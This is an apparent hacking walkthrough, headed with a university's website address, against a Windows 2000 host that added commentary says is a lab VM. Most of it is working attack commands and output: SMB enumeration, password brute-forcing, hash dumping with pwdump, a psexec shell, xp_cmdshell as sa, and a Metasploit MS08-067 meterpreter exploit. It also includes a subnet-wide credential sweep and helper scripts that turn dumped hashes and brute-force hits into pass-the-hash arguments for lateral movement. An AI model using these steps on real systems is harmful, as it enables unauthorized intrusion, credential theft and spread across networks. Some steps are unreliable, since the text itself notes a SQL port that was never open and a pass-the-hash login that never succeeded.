Guangxi Normal University website http://202.103.242.241/
(The hostname "bogon" and the 08:00:27 MAC prefix in the scans below belong to a VirtualBox guest, registered as Cadmus Computer Systems, so the walkthrough was run against a local lab VM carrying that address.)

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r(
SF:GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB NSE scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

Anonymous READ on IPC$ means the host accepts null sessions, which is what let smb-enum-users pull the account list above without any credentials; on Windows 2000 that is the default RestrictAnonymous=0 setting.
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// guess the account passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // fetch pwdump6 to dump the password hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,139,445

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

The format is user:RID => LM hash:NT hash. NO PASSWORD is how pwdump prints the empty-password hash, which agrees with the blank administrator login smb-brute found. For test, 32ED87BDB5FDC5E9CBA88547376818D4 is the NT hash of 123456, and the second half of the LM hash, AAD3B435B51404EE, is the LM value of an empty 7-byte block, so the password is at most 7 characters. TsInternetUser has a full LM hash, so its password is between 8 and 14 characters.
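The hash structure described above can be checked mechanically. The POSIX sh script below is an added example, not part of the original post: it reads a pwdump listing (either raw pwdump6 `user:rid:LM:NT:::` lines or the `| user:rid => LM:NT` lines smb-pwdump prints), flags blank and short (7 characters or fewer) passwords from the LM half alone, and turns each account into the `smbuser=...,smbhash=LM:NT` script-args that nmap's smb library documents for authenticating with a dumped hash instead of a password. The sample input is the four account lines printed above, embedded inline.

```shell
#!/bin/sh
# Triage a pwdump listing: spot blank and short (half-empty LM) passwords and
# build pass-the-hash arguments for nmap's smb library. Added example; not
# part of the original post. Accepts raw pwdump6 lines (user:rid:LM:NT:::)
# or the "| user:rid => LM:NT" lines nmap's smb-pwdump prints.

EMPTY_LM="AAD3B435B51404EE"                 # LM hash of an empty 7-byte half
EMPTY_NT="31D6CFE0D16AE931B73C59D7E0C089C0" # NT hash of the empty password

# Constructed sample: the four account lines smb-pwdump printed above.
SAMPLE_PWDUMP='| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2'

# normalize_pwdump: stdin -> "user:rid:LM:NT" with the hashes upper-cased
normalize_pwdump() {
    sed -e 's/^|_\{0,1\}[[:space:]]*//' -e 's/ => /:/' -e 's/:*$//' |
    awk -F: 'NF >= 4 { printf "%s:%s:%s:%s\n", $1, $2, toupper($3), toupper($4) }'
}

# classify_hashes: stdin -> "user rid verdict", one line per account
classify_hashes() {
    normalize_pwdump | awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
    {
        lm = $3; nt = $4
        lm_blank = (lm ~ /^NO PASSWORD/ || lm == (elm elm))
        nt_blank = (nt ~ /^NO PASSWORD/ || nt == ent)
        if (lm_blank && nt_blank)           verdict = "blank-password"
        else if (lm_blank)                  verdict = "nt-only (LM storage off or password longer than 14)"
        else if (substr(lm, 17, 16) == elm) verdict = "lm-short (7 chars or fewer; LM cracks in seconds)"
        else                                verdict = "lm-long (8-14 chars; LM is still case-insensitive and splits in two)"
        printf "%s %s %s\n", $1, $2, verdict
    }'
}

# smbhash_args: stdin -> one "smbuser=U,smbhash=LM:NT" line per account, the
# --script-args form nmap's smb library documents for pass-the-hash.
# "NO PASSWORD" is mapped to the empty-password hashes the library expects.
smbhash_args() {
    normalize_pwdump | awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
    {
        lm = ($3 ~ /^NO PASSWORD/) ? (elm elm) : $3
        nt = ($4 ~ /^NO PASSWORD/) ? ent : $4
        printf "smbuser=%s,smbhash=%s:%s\n", $1, lm, nt
    }'
}

printf '%s\n' "$SAMPLE_PWDUMP" | classify_hashes
printf '%s\n' "$SAMPLE_PWDUMP" | smbhash_args
```

On the post's own data this reports Administrator and Guest as blank-password, test as lm-short (123456 is six characters) and TsInternetUser as lm-long. A line from smbhash_args can be pasted straight into `--script-args` of any smb script, e.g. `nmap --script=smb-enum-shares --script-args=smbuser=test,smbhash=44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 <target>`, which authenticates with the dumped hash and never needs the plaintext.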
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command through xp_cmdshell
(Port 1433 was not among the open ports in the scan, so this step assumes a SQL Server instance with sa/123456 that the scan output does not show.)

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target for known SMB vulnerabilities
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole   // exploit MS08-067 against the target from Metasploit

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

(bind_tcp makes the target listen and the attacker connect in; that works here because the VM is directly reachable. A target behind NAT or a firewall needs a reverse_tcp payload with LHOST set instead.)
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try the user names and the captured hash against the whole internal range

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Note that the only hit is administrator with a blank password, not test with the hash from password.txt, so this run does not demonstrate a pass-the-hash login. The file also holds only the LM half of test's credentials; the smb library's documented way to authenticate with a dumped hash is the smbhash script-arg, given as an "LM:NT" pair or an NT hash alone. The MAC address is the same as the first target's, so 192.168.1.105 is the same lab VM.
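A sweep like the one above prints one report per host, with the hits buried in the host-script sections. The POSIX sh/awk filter below is an added example, not part of the original post: it reads nmap normal output (`-oN`, or the console output saved with `tee`) and prints one `ip user password` line for every account smb-brute logged into. The sample output is constructed: the first host is the result printed above, the other two (192.168.1.107 with two hits, 192.168.1.110 with none) are made up to show that the current host is tracked across reports and hosts without hits are skipped.

```shell
#!/bin/sh
# Pull the smb-brute hits out of an nmap normal-output sweep of a subnet,
# one "ip user password" per line. Added example; not part of the original
# post. SAMPLE_NMAP is constructed: the first host is the post's own result,
# 192.168.1.107 and 192.168.1.110 are made up.

SAMPLE_NMAP='Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Nmap scan report for 192.168.1.107
Host is up (0.0010s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
Host script results:
| smb-brute:
|   test:123456 => Login was successful
|_  backup:s3cr:t => Login was successful

Nmap scan report for bogon (192.168.1.110)
Host is up (0.0011s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds'

# smb_brute_hits: stdin (nmap -oN or console output) -> "ip user password".
# <blank> is kept literally so the output can be fed back as a credential
# list; only the first ":" separates user from password, so a ":" inside the
# password survives.
smb_brute_hits() {
    awk '
    /^Nmap scan report for/ {             # new host: remember its address
        ip = $NF; gsub(/[()]/, "", ip)    # "bogon (1.2.3.4)" or a bare address
        inbrute = 0
    }
    /^\| smb-brute:/ { inbrute = 1; next } # entering the smb-brute block
    inbrute && /Login was successful/ {
        line = $0
        sub(/^\|[_ ]*/, "", line)         # drop the "|   " or "|_  " prefix
        sub(/ => .*$/, "", line)          # drop the result text
        i = index(line, ":")
        printf "%s %s %s\n", ip, substr(line, 1, i - 1), substr(line, i + 1)
    }
    inbrute && /^\|_/ { inbrute = 0 }     # "|_" closes the script block
    '
}

printf '%s\n' "$SAMPLE_NMAP" | smb_brute_hits
```

Run as `nmap -oN sweep.txt --script=smb-brute.nse ... 192.168.1.1-254 && smb_brute_hits < sweep.txt`; the three columns are exactly what smb-psexec or psexec.exe needs for the next hop.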
Attack successful: a simple nmap + msf attack.